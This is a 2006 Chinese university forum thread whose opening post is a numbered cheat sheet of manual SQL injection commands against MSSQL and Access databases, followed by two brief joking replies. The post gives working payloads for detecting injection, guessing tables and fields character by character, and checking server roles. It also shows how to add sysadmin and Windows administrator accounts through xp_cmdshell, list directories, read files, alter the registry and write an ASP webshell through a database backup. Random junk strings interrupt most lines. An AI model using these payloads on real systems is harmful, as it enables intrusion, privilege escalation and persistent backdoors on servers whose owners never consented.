社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4723阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 z2vrV?:  
  2.初步判断是否是mssql ;and user>0 8L`J](y  
n2zJ'  
  3.注入参数是字符'and [查询条件] and ''=' 26B]b{Iz{  
=H%c/Jty  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' g,h'K  
Wz)s#  
  5.判断数据库系统 _Jx.?8  
#f0J.)M  
  ;and (select count(*) from sysobjects)>0 mssql bX6eNk-L  
2 DJs '"8  
  ;and (select count(*) from msysobjects)>0 access 7m~.V[l1  
\XFF(  
+)k%jIi!  
eU&[^  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 ]dHU  
.t*MGUg  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 FloCR=^H  
8iaP(*J  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 rz+)z:u  
l tE`  
  9.(1)猜字段的ascii值(access) JWoNP/v6  
u|&"l  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 as=Z_a:0N  
ghq[oK  
  (2)猜字段的ascii值(mssql) N_(qMW  
k%YvJXL  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 btoye \ rl  
HR]*75}e  
  10.测试权限结构(mssql) F`IV9qv  
`n7*6l<k~4  
%$}aWzQxll  
hg[ob+"  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }G}2Y (  
>Vc;s !R  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--  =z`#n}v  
70hm9b-   
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -X BD WV  
wXI6KN-  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- mucKmb/  
f|Dq#(^\  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8 -]\C  
Hj\>&vMf  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 9jW/"  
tk=~b} 8  
  ;and 1=(select IS_MEMBER('db_owner'));-- EAafi <n  
4+46z|  
x h|NmZg  
(jhDO7  
  11.添加mssql和系统的帐户 7HfA{.|m  
<g9@iUOI  
  ;exec master.dbo.sp_addlogin username;-- (Klvctoy  
  ;exec master.dbo.sp_password null,username,password;-- <uq#smY  
%z1y3I|`[t  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- P(h[QAM  
'KL!)}B$h  
  ;exec master.dbo.xp_cmdshell 'net user username password <;)qyP  
^q{=mf`  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- q8 jI y@  
+2X q+P  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- *F[;D7sZ~  
=6Z$nc R  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 9qe<bds1  
lHl1Ny\?  
.]gY{_|x  
?VM4_dugf  
  12.(1)遍历目录 *Y"j 0Yob  
U`*L`PM  
  ;create table dirs(paths varchar(100), id int) iLhxcM2K  
(c3%rM m]  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' #21t8  
[*i6?5}-  
  ;and (select top 1 paths from dirs)>0 bIs@CDB  
`)Z+]5:  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) P`ZYm  
Y\cQ "9  
)TH~Tq:  
;`CNe$y   
  (2)遍历目录 (bT3 r_  
v J `'x  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6B pm+}  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 )cF1?2  
cwK+{*ZH/  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Qx{[#[Da  
Zcq 4?-&  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9bE/7v  
'5:P,1tW U  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~sk{O%OI  
Tw)"#Y!T  
sPKyg  
b0vbE8wa  
  13.mssql中的存储过程 M?yWFqFt9m  
VlLc[eVV  
  xp_regenumvalues 注册表根键, 子键 utJz e  
ww0m1FzX  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $hCPmiI  
l>H G|ol  
  xp_regread 根键,子键,键值名 c2$&pZ M  
HJV8P2f8`  
  ;exec xp_regread XyM?Dc5,  
qUW>qi,  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 vW\|% @hW,  
@Z50S 8  
  xp_regwrite 根键,子键, 值名, 值类型, 值 GNv5yWQ@  
'yq'J)  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Q<e`0cu|p  
[;]@PKW?w  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 C}~/(;1V=  
HJ\CGYmyz  
  xp_regdeletevalue 根键,子键,值名 OR\-%JX/5  
N%2UL&w#B  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 4dok/ +Ec  
(,TO|  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 PA=BNKlH  
*7vPU:Q[  
6,h<0j{  
2kgm)-z  
  14.mssql的backup创建webshell 0jzA\$oD  
]e3nnS1*.  
  use model w[+!c-A:H  
5;Z~+$1  
  create table cmd(str image); ""a8eB 6  
co@8w!W  
  insert into cmd(str) values (''); lz*2wGI9  
jFc{$#g-  
  backup database model to disk='c:\l.asp'; x!jhWX  
Lf:Z (Z>  
b7,qzh  
0IdD   
  15.mssql内置函数  {Eb6.  
oaK~:'  
  ;and (select @@version)>0 获得Windows的版本号 B)|s.Ez  
-s1VlS/  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa d{m0uX56  
S-H3UND"  
  ;and (select user_name())>0 爆当前系统的连接用户 W!(Q_B  
Xm-63U`w5  
  ;and (select db_name())>0 得到当前连接的数据库 zKutx6=aj  
onlyvH4  
P}I*SV0  
h`Mf;'P  
  16.简洁的webshell CMr`n8M  
Ygl!fC 4b  
  use model gn%"dfm  
$d=lDN  
  create table cmd(str image); L;  ~=(  
O`=Uq0Vv  
  insert into cmd(str) values (''); U_~~PCi  
vKC>t95  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八